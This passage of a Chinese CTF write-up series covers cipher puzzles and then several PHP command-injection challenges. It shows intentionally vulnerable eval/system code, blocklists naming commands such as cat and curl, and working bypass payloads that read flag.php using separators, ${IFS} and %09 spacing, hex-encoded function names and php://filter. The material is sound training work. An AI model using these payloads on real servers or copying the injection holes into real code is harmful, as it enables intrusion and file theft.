<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code><span class="pln">payload</span><span class="pun">：?</span><span class="pln">cmd</span><span class="pun">=*.</span><span class="pln">php</span></code></li></ol></pre><h2 id="h2-ctf-69"><a name="CTF-69" class="reference-link"></a><span class="header-link octicon octicon-link"></span>CTF-69</h2><p><strong>一道培根加密题</strong><br>培根加解密<br><a href="http://www.hiencode.com/baconian.html">http://www.hiencode.com/baconian.html</a><br>进行解密获得flag<br>flaggfkqpwepxqmvlwoq</p>
<h2 id="h2-ctf-70"><a name="CTF-70" class="reference-link"></a><span class="header-link octicon octicon-link"></span>CTF-70</h2><p><strong>双重加密题</strong><br><strong>先进行了莫斯电码加密再进行培根加密</strong><br>按顺序解密就行<br>莫斯电码加解密<br><a href="http://www.all-tool.cn/Tools/morse/?&amp;rand=543a5f6f0bec4482aa361eccf2814626">http://www.all-tool.cn/Tools/morse/?&amp;rand=543a5f6f0bec4482aa361eccf2814626</a></p>
<p>培根加解密<br><a href="http://www.hiencode.com/baconian.html">http://www.hiencode.com/baconian.html</a></p>
<p>进行解密获得flag<br>flagopophellohackthisoneflagniceo</p>
<h2 id="h2-ctf-71"><a name="CTF-71" class="reference-link"></a><span class="header-link octicon octicon-link"></span>CTF-71</h2><p><strong>一道双重编码题</strong><br><strong>先进行了16进制编码再进行base64编</strong>码<br>先16进制解码，再把base64编码转换成图片<br>16进制编解码<br><a href="http://www.hiencode.com/hex.html">http://www.hiencode.com/hex.html</a></p>
<p>base64编解码<br><a href="http://tool.chinaz.com/tools/imgtobase/">http://tool.chinaz.com/tools/imgtobase/</a></p>
<p>还原出图片后扫码获得flag<br>flag{ASQW2130DSFJHKLJL}</p>
<h2 id="h2-ctf-72"><a name="CTF-72" class="reference-link"></a><span class="header-link octicon octicon-link"></span>CTF-72</h2><pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code class="lang-php"><span class="pun">&lt;?</span><span class="pln">php </span></code></li><li class="L1"><code class="lang-php"><span class="kwd">if</span><span class="pun">(</span><span class="pln">isset</span><span class="pun">(</span><span class="pln">$_GET</span><span class="pun">[</span><span class="str">'url'</span><span class="pun">])){</span></code></li><li class="L2"><code class="lang-php"><span class="pln">    system</span><span class="pun">(</span><span class="str">"curl https://"</span><span class="pun">.</span><span class="pln">$_GET</span><span class="pun">[</span><span class="str">'url'</span><span class="pun">].</span><span class="str">".ctf.GOOG"</span><span class="pun">);</span></code></li><li class="L3"><code class="lang-php"><span class="pun">}</span><span class="pln"> </span><span class="kwd">else</span><span class="pun">{</span></code></li><li class="L4"><code class="lang-php"><span class="pln">    show_source</span><span class="pun">(</span><span class="pln">__FILE__</span><span class="pun">);</span></code></li><li class="L5"><code class="lang-php"><span class="pun">}</span></code></li><li class="L6"><code class="lang-php"><span class="pun">?&gt;</span></code></li></ol></pre>
<p><strong>get传递参数必须要有URL，然后根据URL里面的内容在系统下自动执行curl命令，解题的巧妙之处在于采用分割符“;”，分开执行命令</strong></p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code><span class="pun">构造：?</span><span class="pln">url</span><span class="pun">=</span><span class="lit">1</span><span class="pun">;</span><span class="pln">ls</span><span class="pun">;</span><span class="pln">www</span></code></li><li class="L1"><code><span class="pun">回显：</span><span class="pln">flag</span><span class="pun">.</span><span class="pln">php index</span><span class="pun">.</span><span class="pln">php</span></code></li><li class="L2"><code></code></li><li class="L3"><code><span class="pun">继续构造：</span></code></li><li class="L4"><code><span class="pln">payload</span><span class="pun">：?</span><span class="pln">url</span><span class="pun">=</span><span class="lit">1</span><span class="pun">;</span><span class="pln">cat flag</span><span class="pun">.</span><span class="pln">php</span><span class="pun">;</span><span class="pln">www</span></code></li></ol></pre><h2 id="h2-ctf-73"><a name="CTF-73" class="reference-link"></a><span class="header-link octicon octicon-link"></span>CTF-73</h2><p><strong>源码分析</strong></p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code class="lang-php"><span class="pun">&lt;?</span><span class="pln">php</span></code></li><li class="L1"><code class="lang-php"><span class="pln">error_reporting</span><span class="pun">(</span><span class="lit">0</span><span class="pun">);</span></code></li><li class="L2"><code class="lang-php"><span class="kwd">if</span><span class="pun">(</span><span class="pln">isset</span><span class="pun">(</span><span class="pln">$_GET</span><span class="pun">[</span><span class="str">'c'</span><span class="pun">])){</span></code></li><li class="L3"><code class="lang-php"><span class="pln">    $c </span><span class="pun">=</span><span class="pln"> $_GET</span><span class="pun">[</span><span class="str">'c'</span><span class="pun">];</span></code></li><li class="L4"><code class="lang-php"><span class="pln">    </span><span class="kwd">if</span><span class="pun">(!</span><span class="pln">preg_match</span><span class="pun">(</span><span class="str">"/flag|system|php/i"</span><span class="pun">,</span><span class="pln"> $c</span><span class="pun">)){</span></code></li><li class="L5"><code class="lang-php"><span class="pln">        </span><span class="kwd">eval</span><span class="pun">(</span><span class="pln">$c</span><span class="pun">);</span></code></li><li class="L6"><code class="lang-php"><span class="pln">    </span><span class="pun">}</span></code></li><li class="L7"><code class="lang-php"><span class="pun">}</span><span class="pln"> </span><span class="kwd">else</span><span class="pun">{</span></code></li><li class="L8"><code class="lang-php"><span class="pln">    highlight_file</span><span class="pun">(</span><span class="pln">__FILE__</span><span class="pun">);</span></code></li><li class="L9"><code class="lang-php"><span class="pun">}</span></code></li><li class="L0"><code class="lang-php"><span class="pun">?&gt;</span></code></li></ol></pre>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code><span class="pln"> </span><span class="pun">绕过特殊字符过滤</span></code></li><li class="L1"><code><span class="pln"> </span><span class="pun">?</span><span class="pln">c</span><span class="pun">=</span><span class="pln">echo </span><span class="str">`tac fl?g.???`</span><span class="pun">;</span></code></li><li class="L2"><code><span class="pln"> </span><span class="pun">?</span><span class="pln">c</span><span class="pun">=</span><span class="pln">echo </span><span class="kwd">exec</span><span class="pun">(</span><span class="str">'nl fl?g.???'</span><span class="pun">);</span></code></li><li class="L3"><code><span class="pln"> </span><span class="pun">?</span><span class="pln">c</span><span class="pun">=</span><span class="pln">echo shell_exec</span><span class="pun">(</span><span class="str">'nl fl?g.???'</span><span class="pun">);</span><span class="com">//此函数与反引号异曲同工</span></code></li><li class="L4"><code><span class="pln"> </span><span class="pun">?</span><span class="pln">c</span><span class="pun">=</span><span class="pln">echo passthru</span><span class="pun">(</span><span class="str">'nl fl?g.???'</span><span class="pun">);</span><span class="com">//当所执行的 Unix 命令输出二进制数据，需要直接传送到浏览器的时候,就用他来代替exec和system，调用命令自动去除部分符号：",\</span></code></li></ol></pre><h2 id="h2-ctf-74"><a name="CTF-74" class="reference-link"></a><span class="header-link octicon octicon-link"></span>CTF-74</h2><p><strong>源码分析</strong></p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code class="lang-php"><span class="pun">&lt;?</span><span class="pln">php</span></code></li><li class="L1"><code class="lang-php"><span class="pln">error_reporting</span><span class="pun">(</span><span class="lit">0</span><span class="pun">);</span></code></li><li class="L2"><code class="lang-php"><span class="kwd">if</span><span class="pun">(</span><span class="pln">isset</span><span class="pun">(</span><span class="pln">$_GET</span><span class="pun">[</span><span class="str">'c'</span><span class="pun">])){</span></code></li><li class="L3"><code class="lang-php"><span class="pln">    $c </span><span class="pun">=</span><span class="pln"> $_GET</span><span class="pun">[</span><span class="str">'c'</span><span class="pun">];</span></code></li><li class="L4"><code class="lang-php"><span class="pln">    </span><span class="kwd">if</span><span class="pun">(!</span><span class="pln">preg_match</span><span class="pun">(</span><span class="str">"/flag|system|php|cat|sort|shell|\.'/i"</span><span class="pun">,</span><span class="pln"> $c</span><span class="pun">)){;</span></code></li><li class="L5"><code class="lang-php"><span class="pln">        </span><span class="kwd">eval</span><span class="pun">(</span><span class="pln">$c</span><span class="pun">);</span></code></li><li class="L6"><code class="lang-php"><span class="pln">    </span><span class="pun">}</span></code></li><li class="L7"><code class="lang-php"><span class="pun">}</span><span class="pln"> </span><span class="kwd">else</span><span class="pun">{</span></code></li><li class="L8"><code class="lang-php"><span class="pln">    highlight_file</span><span class="pun">(</span><span class="pln">__FILE__</span><span class="pun">);</span></code></li><li class="L9"><code class="lang-php"><span class="pun">}</span></code></li><li class="L0"><code class="lang-php"><span class="pun">?&gt;</span></code></li></ol></pre>
<p><strong>考点：针对读取文件的命令进行了禁止，同时单引号、点和空格也没了</strong></p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code><span class="pln">payload</span><span class="pun">:</span></code></li><li class="L1"><code></code></li><li class="L2"><code><span class="pun">?</span><span class="pln">c</span><span class="pun">=</span><span class="pln">highlight_file</span><span class="pun">(</span><span class="kwd">next</span><span class="pun">(</span><span class="pln">array_reverse</span><span class="pun">(</span><span class="pln">scandir</span><span class="pun">(</span><span class="pln">dirname</span><span class="pun">(</span><span class="pln">__FILE__</span><span class="pun">)))));</span></code></li><li class="L3"><code></code></li><li class="L4"><code><span class="pun">?</span><span class="pln">c</span><span class="pun">=</span><span class="pln">print_r</span><span class="pun">(</span><span class="str">`nl%09fl[abc]*`</span><span class="pun">);</span></code></li><li class="L5"><code></code></li><li class="L6"><code><span class="pun">?</span><span class="pln">c</span><span class="pun">=</span><span class="str">"\x73\x79\x73\x74\x65\x6d"</span><span class="pun">(</span><span class="str">"nl%09fl[a]*"</span><span class="pun">);</span></code></li><li class="L7"><code><span class="com">//等价于system(),说明双引号会自动解析</span></code></li><li class="L8"><code></code></li><li class="L9"><code><span class="pun">?</span><span class="pln">c</span><span class="pun">=</span><span class="pln">echo</span><span class="str">`strings%09f*`</span><span class="pun">;</span></code></li><li class="L0"><code><span class="com">//在对象文件或二进制文件中查找可打印的字符串</span></code></li></ol></pre><h2 id="h2-ctf-75"><a name="CTF-75" class="reference-link"></a><span class="header-link octicon octicon-link"></span>CTF-75</h2><p><strong>源码分析</strong></p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code class="lang-php"><span class="pun">&lt;?</span><span class="pln">php</span></code></li><li class="L1"><code class="lang-php"><span class="pln">error_reporting</span><span class="pun">(</span><span class="lit">0</span><span class="pun">);</span></code></li><li class="L2"><code class="lang-php"><span class="kwd">if</span><span class="pun">(</span><span class="pln">isset</span><span class="pun">(</span><span class="pln">$_GET</span><span class="pun">[</span><span class="str">'c'</span><span class="pun">])){</span></code></li><li class="L3"><code class="lang-php"><span class="pln">    $c </span><span class="pun">=</span><span class="pln"> $_GET</span><span class="pun">[</span><span class="str">'c'</span><span class="pun">];</span></code></li><li class="L4"><code class="lang-php"><span class="pln">    </span><span class="kwd">if</span><span class="pun">(!</span><span class="pln">preg_match</span><span class="pun">(</span><span class="str">"/flag|system|php|cat|sort|shell|\.|\'|\`|echo|\;|\(/i"</span><span class="pun">,</span><span class="pln"> $c</span><span class="pun">)){</span></code></li><li class="L5"><code class="lang-php"><span class="pln">        </span><span class="kwd">eval</span><span class="pun">(</span><span class="pln">$c</span><span class="pun">);</span></code></li><li class="L6"><code class="lang-php"><span class="pln">    </span><span class="pun">}</span></code></li><li class="L7"><code class="lang-php"><span class="pun">}</span><span class="pln"> </span><span class="kwd">else</span><span class="pun">{</span></code></li><li class="L8"><code class="lang-php"><span class="pln">    highlight_file</span><span class="pun">(</span><span class="pln">__FILE__</span><span class="pun">);</span></code></li><li class="L9"><code class="lang-php"><span class="pun">}</span></code></li></ol></pre>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code><span class="pln">payload</span><span class="pun">：</span></code></li><li class="L1"><code><span class="pun">?</span><span class="pln">c</span><span class="pun">=</span><span class="pln">include$_GET</span><span class="pun">[</span><span class="pln">a</span><span class="pun">]?&gt;&amp;</span><span class="pln">a</span><span class="pun">=</span><span class="pln">php</span><span class="pun">:</span><span class="com">//filter/read=convert.base64-encode/resource=flag.php</span></code></li></ol></pre><p><strong>知识点：include可以不用括号，分号可以用?&gt;代替</strong></p>
<h2 id="h2-ctf-76"><a name="CTF-76" class="reference-link"></a><span class="header-link octicon octicon-link"></span>CTF-76</h2><p><strong>源码分析</strong></p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code class="lang-php"><span class="pun">&lt;?</span><span class="pln">php </span></code></li><li class="L1"><code class="lang-php"><span class="kwd">if</span><span class="pun">(</span><span class="pln">isset</span><span class="pun">(</span><span class="pln">$_GET</span><span class="pun">[</span><span class="str">'c'</span><span class="pun">])){</span></code></li><li class="L2"><code class="lang-php"><span class="pln">    $c</span><span class="pun">=</span><span class="pln">$_GET</span><span class="pun">[</span><span class="str">'c'</span><span class="pun">];</span></code></li><li class="L3"><code class="lang-php"><span class="pln">    system</span><span class="pun">(</span><span class="pln">$c</span><span class="pun">.</span><span class="str">" &gt;/dev/null 2&gt;&amp;1"</span><span class="pun">);</span></code></li><li class="L4"><code class="lang-php"><span class="pun">}</span><span class="pln"> </span><span class="kwd">else</span><span class="pun">{</span></code></li><li class="L5"><code class="lang-php"><span class="pln">    highlight_file</span><span class="pun">(</span><span class="pln">__FILE__</span><span class="pun">);</span></code></li><li class="L6"><code class="lang-php"><span class="pun">}</span></code></li></ol></pre>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code><span class="lit">1</span><span class="pun">：&gt;</span><span class="pln"> </span><span class="pun">代表重定向到哪里，例如：</span><span class="pln">echo </span><span class="pun">“</span><span class="lit">123</span><span class="pun">”</span><span class="pln"> </span><span class="pun">&gt;</span><span class="pln"> </span><span class="str">/home/</span><span class="lit">123.txt</span></code></li><li class="L1"><code><span class="lit">2</span><span class="pun">：/</span><span class="pln">dev</span><span class="pun">/</span><span class="kwd">null</span><span class="pln"> </span><span class="pun">代表空设备文件</span></code></li><li class="L2"><code><span class="lit">3</span><span class="pun">：</span><span class="lit">2</span><span class="pun">&gt;</span><span class="pln"> </span><span class="pun">表示</span><span class="pln">stderr</span><span class="pun">标准错误</span></code></li><li class="L3"><code><span class="lit">4</span><span class="pun">：&amp;</span><span class="pln"> </span><span class="pun">表示等同于的意思，</span><span class="lit">2</span><span class="pun">&gt;&amp;</span><span class="lit">1</span><span class="pun">，表示</span><span class="lit">2</span><span class="pun">的输出重定向等同于</span><span class="lit">1</span></code></li><li class="L4"><code><span class="lit">5</span><span class="pun">：</span><span class="lit">1</span><span class="pln"> </span><span class="pun">表示</span><span class="pln">stdout</span><span class="pun">标准输出，系统默认值是</span><span class="lit">1</span><span class="pun">，所以”&gt;</span><span class="str">/dev/</span><span class="kwd">null</span><span class="pun">”等同于</span><span class="pln"> </span><span class="pun">“</span><span class="lit">1</span><span class="pun">&gt;</span><span class="str">/dev/</span><span class="kwd">null</span><span class="pun">”</span></code></li><li class="L5"><code><span class="pun">因此，&gt;</span><span class="str">/dev/</span><span class="kwd">null</span><span class="pln"> </span><span class="lit">2</span><span class="pun">&gt;&amp;</span><span class="lit">1</span><span class="pln"> </span><span class="pun">也可以写成“</span><span class="lit">1</span><span class="pun">&gt;</span><span class="pln"> </span><span class="str">/dev/</span><span class="kwd">null</span><span class="pln"> </span><span class="lit">2</span><span class="pun">&gt;</span><span class="pln"> </span><span class="pun">&amp;</span><span class="lit">1</span><span class="pun">”</span></code></li></ol></pre><pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code><span class="pun">语句执行过程为：</span></code></li><li class="L1"><code><span class="lit">1</span><span class="pun">&gt;</span><span class="str">/dev/</span><span class="kwd">null</span><span class="pln"> </span><span class="pun">：首先表示标准输出重定向到空设备文件，也就是不输出任何信息到终端，也就是不显示任何信息。</span></code></li><li class="L2"><code><span class="lit">2</span><span class="pun">&gt;&amp;</span><span class="lit">1</span><span class="pln"> </span><span class="pun">：</span><span class="pln"> </span><span class="pun">接着，标准错误输出重定向到标准输出，因为之前标准输出已经重定向到了空设备文件，所以标准错误输出也重定向到空设备文件。</span></code></li></ol></pre><pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code><span class="lit">0</span><span class="pun">表示键盘输入，</span><span class="lit">1</span><span class="pun">表示屏幕输出，</span><span class="lit">2</span><span class="pun">表示错误输出！</span></code></li><li class="L1"><code><span class="pun">‘</span><span class="pln"> </span><span class="pun">&gt;</span><span class="pln"> </span><span class="pun">’</span><span class="pln"> </span><span class="pun">默认标准输出重定向，与</span><span class="lit">1</span><span class="pun">&gt;相同</span></code></li><li class="L2"><code><span class="lit">2</span><span class="pun">&gt;&amp;</span><span class="lit">1</span><span class="pln"> </span><span class="pun">意思是把标准错误输出重定向到标准输出</span></code></li><li class="L3"><code><span class="pun">&amp;&gt;</span><span class="pln">file </span><span class="pun">意思是把标准输出和标准错误输出都重定向到文件</span><span class="pln">file</span><span class="pun">中</span></code></li></ol></pre><p>而我们想要得到输出，就不能让后面的进行执行，所以可以加上截断语句</p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code><span class="pln">payload</span><span class="pun">:</span></code></li><li class="L1"><code><span class="pun">?</span><span class="pln">c</span><span class="pun">=</span><span class="pln">cat flag</span><span class="pun">.</span><span class="pln">php</span><span class="pun">||</span></code></li><li class="L2"><code><span class="pun">?</span><span class="pln">c</span><span class="pun">=</span><span class="pln">cat flag</span><span class="pun">.</span><span class="pln">php</span><span class="pun">%</span><span class="lit">26</span></code></li><li class="L3"><code><span class="pun">?</span><span class="pln">c</span><span class="pun">=</span><span class="pln">cat flag</span><span class="pun">.</span><span class="pln">php</span><span class="pun">%</span><span class="lit">26</span><span class="pun">%</span><span class="lit">26</span></code></li><li class="L4"><code><span class="pun">?</span><span class="pln">c</span><span class="pun">=</span><span class="pln">cat flag</span><span class="pun">.</span><span class="pln">php</span><span class="pun">%</span><span class="lit">0a</span></code></li><li class="L5"><code><span class="pun">?</span><span class="pln">c</span><span class="pun">=</span><span class="pln">cat flag</span><span class="pun">.</span><span class="pln">php</span><span class="pun">;</span></code></li></ol></pre><h2 id="h2-ctf-77"><a name="CTF-77" class="reference-link"></a><span class="header-link octicon octicon-link"></span>CTF-77</h2><p><strong>源码分析</strong></p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code class="lang-php"><span class="pun">&lt;?</span><span class="pln">php</span></code></li><li class="L1"><code class="lang-php"><span class="kwd">if</span><span class="pun">(</span><span class="pln">isset</span><span class="pun">(</span><span class="pln">$_GET</span><span class="pun">[</span><span class="str">'c'</span><span class="pun">])){</span></code></li><li class="L2"><code class="lang-php"><span class="pln">    $c</span><span class="pun">=</span><span class="pln">$_GET</span><span class="pun">[</span><span class="str">'c'</span><span class="pun">];</span></code></li><li class="L3"><code class="lang-php"><span class="pln">    </span><span class="kwd">if</span><span class="pun">(!</span><span class="pln">preg_match</span><span class="pun">(</span><span class="str">"/;|cat|flag| |[0-9]|\$|*/i"</span><span class="pun">,</span><span class="pln"> $c</span><span class="pun">)){</span></code></li><li class="L4"><code class="lang-php"><span class="pln">        system</span><span class="pun">(</span><span class="pln">$c</span><span class="pun">.</span><span class="str">" &gt;/dev/null 2&gt;&amp;1"</span><span class="pun">);</span></code></li><li class="L5"><code class="lang-php"><span class="pln">    </span><span class="pun">}</span></code></li><li class="L6"><code class="lang-php"><span class="pun">}</span><span class="pln"> </span><span class="kwd">else</span><span class="pun">{</span></code></li><li class="L7"><code class="lang-php"><span class="pln">    highlight_file</span><span class="pun">(</span><span class="pln">__FILE__</span><span class="pun">);</span></code></li><li class="L8"><code class="lang-php"><span class="pun">}</span></code></li><li class="L9"><code class="lang-php"><span class="pun">?&gt;</span></code></li></ol></pre>
<p><strong>过滤了”/\;|cat|flag| |[0-9]|\$|*/i”用其他命令绕过</strong></p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code><span class="pun">&gt;</span><span class="pln"> </span><span class="pun">&lt;</span><span class="pln"> </span><span class="pun">&lt;&gt;</span><span class="pln"> </span><span class="pun">重定向符</span></code></li><li class="L1"><code><span class="pun">%</span><span class="lit">09</span><span class="pun">(需要</span><span class="pln">php</span><span class="pun">环境)</span></code></li><li class="L2"><code><span class="pln">$</span><span class="pun">{</span><span class="pln">IFS</span><span class="pun">}</span></code></li><li class="L3"><code><span class="pln">$IFS$9</span></code></li><li class="L4"><code><span class="pln">$IFS\</span></code></li><li class="L5"><code><span class="pun">{</span><span class="pln">cat</span><span class="pun">,</span><span class="pln">flag</span><span class="pun">.</span><span class="pln">php</span><span class="pun">}</span><span class="pln"> </span><span class="com">//用逗号实现了空格功能</span></code></li><li class="L6"><code><span class="pun">%</span><span class="lit">20</span></code></li><li class="L7"><code><span class="pun">%</span><span class="lit">09</span></code></li></ol></pre><pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code><span class="pln">payload</span><span class="pun">:</span></code></li><li class="L1"><code><span class="pun">?</span><span class="pln">c</span><span class="pun">=</span><span class="pln">tac</span><span class="pun">%</span><span class="lit">09fla</span><span class="pun">?.</span><span class="pln">php</span><span class="pun">||</span></code></li><li class="L2"><code><span class="pun">?</span><span class="pln">c</span><span class="pun">=</span><span class="pln">nl</span><span class="pun">%</span><span class="lit">09fla</span><span class="str">''</span><span class="pln">g</span><span class="pun">.</span><span class="pln">php</span><span class="pun">%</span><span class="lit">0a</span></code></li><li class="L3"><code><span class="pun">?</span><span class="pln">c</span><span class="pun">=</span><span class="pln">more</span><span class="pun">%</span><span class="lit">09fl</span><span class="pln">\ag</span><span class="pun">.</span><span class="pln">php</span><span class="pun">%</span><span class="lit">26</span></code></li></ol></pre><h2 id="h2-ctf-78"><a name="CTF-78" class="reference-link"></a><span class="header-link octicon octicon-link"></span>CTF-78</h2><p><strong>源码分析</strong></p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code class="lang-php"><span class="pun">&lt;?</span><span class="pln">php </span></code></li><li class="L1"><code class="lang-php"><span class="kwd">if</span><span class="pun">(</span><span class="pln">isset</span><span class="pun">(</span><span class="pln">$_GET</span><span class="pun">[</span><span class="str">'c'</span><span class="pun">])){</span></code></li><li class="L2"><code class="lang-php"><span class="pln">    $c</span><span class="pun">=</span><span class="pln">$_GET</span><span class="pun">[</span><span class="str">'c'</span><span class="pun">];</span></code></li><li class="L3"><code class="lang-php"><span class="pln">    </span><span class="kwd">if</span><span class="pun">(!</span><span class="pln">preg_match</span><span class="pun">(</span><span class="str">"/;|cat|flag| |[0-9]|\$|*|more|less|head|sort|tail/i"</span><span class="pun">,</span><span class="pln"> $c</span><span class="pun">)){</span></code></li><li class="L4"><code class="lang-php"><span class="pln">        system</span><span class="pun">(</span><span class="pln">$c</span><span class="pun">.</span><span class="str">" &gt;/dev/null 2&gt;&amp;1"</span><span class="pun">);</span></code></li><li class="L5"><code class="lang-php"><span class="pln">    </span><span class="pun">}</span></code></li><li class="L6"><code class="lang-php"><span class="pun">}</span><span class="pln"> </span><span class="kwd">else</span><span class="pun">{</span></code></li><li class="L7"><code class="lang-php"><span class="pln">    highlight_file</span><span class="pun">(</span><span class="pln">__FILE__</span><span class="pun">);</span></code></li><li class="L8"><code class="lang-php"><span class="pun">}</span></code></li><li class="L9"><code class="lang-php"><span class="pun">?&gt;</span></code></li></ol></pre>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code><span class="pun">适用条件:过滤了</span><span class="pln">cat</span></code></li><li class="L1"><code><span class="lit">1</span><span class="pun">)</span><span class="pln">more</span><span class="pun">:一页一页的显示档案内容</span></code></li><li class="L2"><code><span class="pun">(</span><span class="lit">2</span><span class="pun">)</span><span class="pln">less</span><span class="pun">:与</span><span class="pln"> more </span><span class="pun">类似，但是比</span><span class="pln"> more </span><span class="pun">更好的是，他可以[</span><span class="pln">pg dn</span><span class="pun">][</span><span class="pln">pg up</span><span class="pun">]翻页</span></code></li><li class="L3"><code><span class="pun">(</span><span class="lit">3</span><span class="pun">)</span><span class="pln">head</span><span class="pun">:查看头几行</span></code></li><li class="L4"><code><span class="pun">(</span><span class="lit">4</span><span class="pun">)</span><span class="pln">tac</span><span class="pun">:从最后一行开始显示，可以看出</span><span class="pln"> tac </span><span class="pun">是</span><span class="pln"> cat </span><span class="pun">的反向显示</span></code></li><li class="L5"><code><span class="pun">(</span><span class="lit">5</span><span class="pun">)</span><span class="pln">tail</span><span class="pun">:查看尾几行</span></code></li><li class="L6"><code><span class="pun">(</span><span class="lit">6</span><span class="pun">)</span><span class="pln">nl</span><span class="pun">：显示的时候，顺便输出行号</span></code></li><li class="L7"><code><span class="pun">(</span><span class="lit">7</span><span class="pun">)</span><span class="pln">od</span><span class="pun">:以二进制的方式读取档案内容</span></code></li><li class="L8"><code><span class="pun">(</span><span class="lit">8</span><span class="pun">)</span><span class="pln">vi</span><span class="pun">:一种编辑器，这个也可以查看</span></code></li><li class="L9"><code><span class="pun">(</span><span class="lit">9</span><span class="pun">)</span><span class="pln">vim</span><span class="pun">:一种编辑器，这个也可以查看</span></code></li><li class="L0"><code><span class="pun">(</span><span class="lit">10</span><span class="pun">)</span><span class="pln">sort</span><span class="pun">:可以查看,将文件进行排序并输出</span></code></li><li class="L1"><code><span class="pun">(</span><span class="lit">11</span><span class="pun">)</span><span class="pln">uniq</span><span class="pun">:可以查看，报告或忽略文件中的重复行</span></code></li><li class="L2"><code><span class="pun">(</span><span class="lit">12</span><span class="pun">)</span><span class="pln">file </span><span class="pun">-</span><span class="pln">f</span><span class="pun">:报错出具体内容</span></code></li><li class="L3"><code><span class="pln">grep grep test </span><span class="pun">*</span><span class="pln">file   </span><span class="com">#在当前目录中，查找后缀有 file 字样的文件中包含 test 字符串的文件，并打印出该字符串的行</span></code></li></ol></pre><pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code><span class="pln">payload</span><span class="pun">:</span></code></li><li class="L1"><code><span class="pun">?</span><span class="pln">c</span><span class="pun">=</span><span class="pln">uniq</span><span class="pun">%</span><span class="lit">09fla</span><span class="pun">?.</span><span class="pln">php</span><span class="pun">%</span><span class="lit">26</span></code></li><li class="L2"><code><span class="pun">?</span><span class="pln">c</span><span class="pun">=</span><span class="pln">od</span><span class="pun">%</span><span class="lit">09fl</span><span class="pln">\ag</span><span class="pun">.</span><span class="pln">php</span><span class="pun">%</span><span class="lit">26</span><span class="pun">%</span><span class="lit">26</span></code></li><li class="L3"><code><span class="pun">?</span><span class="pln">c</span><span class="pun">=</span><span class="pln">vi</span><span class="pun">%</span><span class="lit">09fl</span><span class="pln">\ag</span><span class="pun">.</span><span class="pln">php</span><span class="pun">%</span><span class="lit">26</span><span class="pun">%</span><span class="lit">26</span></code></li><li class="L4"><code><span class="pun">?</span><span class="pln">c</span><span class="pun">=</span><span class="pln">tac</span><span class="pun">%</span><span class="lit">09fl</span><span class="pln">\ag</span><span class="pun">.</span><span class="pln">php</span><span class="pun">||</span></code></li></ol></pre><h2 id="h2-ctf-79"><a name="CTF-79" class="reference-link"></a><span class="header-link octicon octicon-link"></span>CTF-79</h2><p><strong>源码分析</strong></p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code class="lang-php"><span class="pun">&lt;?</span><span class="pln">php</span></code></li><li class="L1"><code class="lang-php"><span class="pln">  </span><span class="kwd">if</span><span class="pun">(</span><span class="pln">isset</span><span class="pun">(</span><span class="pln">$_GET</span><span class="pun">[</span><span class="str">'c'</span><span class="pun">])){</span></code></li><li class="L2"><code class="lang-php"><span class="pln">    $c</span><span class="pun">=</span><span class="pln">$_GET</span><span class="pun">[</span><span class="str">'c'</span><span class="pun">];</span></code></li><li class="L3"><code class="lang-php"><span class="pln">    </span><span class="kwd">if</span><span class="pun">(!</span><span class="pln">preg_match</span><span class="pun">(</span><span class="str">"/;|cat|flag| |[0-9]|*|more|less|head|sort|tail|sed|cut|tac|awk|strings|od|curl|`|%|x09|x26|&gt;|&lt;/i"</span><span class="pun">,</span><span class="pln"> $c</span><span class="pun">)){</span></code></li><li class="L4"><code class="lang-php"><span class="pln">        system</span><span class="pun">(</span><span class="pln">$c</span><span class="pun">.</span><span class="str">" &gt;/dev/null 2&gt;&amp;1"</span><span class="pun">);</span></code></li><li class="L5"><code class="lang-php"><span class="pln">    </span><span class="pun">}</span></code></li><li class="L6"><code class="lang-php"><span class="pun">}</span><span class="pln"> </span><span class="kwd">else</span><span class="pun">{</span></code></li><li class="L7"><code class="lang-php"><span class="pln">    highlight_file</span><span class="pun">(</span><span class="pln">__FILE__</span><span class="pun">);</span></code></li><li class="L8"><code class="lang-php"><span class="pun">}</span></code></li><li class="L9"><code class="lang-php"><span class="pun">?&gt;</span></code></li></ol></pre>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code><span class="pun">适用条件:过滤了</span><span class="pln">cat</span></code></li><li class="L1"><code><span class="lit">1</span><span class="pun">)</span><span class="pln">more</span><span class="pun">:一页一页的显示档案内容</span></code></li><li class="L2"><code><span class="pun">(</span><span class="lit">2</span><span class="pun">)</span><span class="pln">less</span><span class="pun">:与</span><span class="pln"> more </span><span class="pun">类似，但是比</span><span class="pln"> more </span><span class="pun">更好的是，他可以[</span><span class="pln">pg dn</span><span class="pun">][</span><span class="pln">pg up</span><span class="pun">]翻页</span></code></li><li class="L3"><code><span class="pun">(</span><span class="lit">3</span><span class="pun">)</span><span class="pln">head</span><span class="pun">:查看头几行</span></code></li><li class="L4"><code><span class="pun">(</span><span class="lit">4</span><span class="pun">)</span><span class="pln">tac</span><span class="pun">:从最后一行开始显示，可以看出</span><span class="pln"> tac </span><span class="pun">是</span><span class="pln"> cat </span><span class="pun">的反向显示</span></code></li><li class="L5"><code><span class="pun">(</span><span 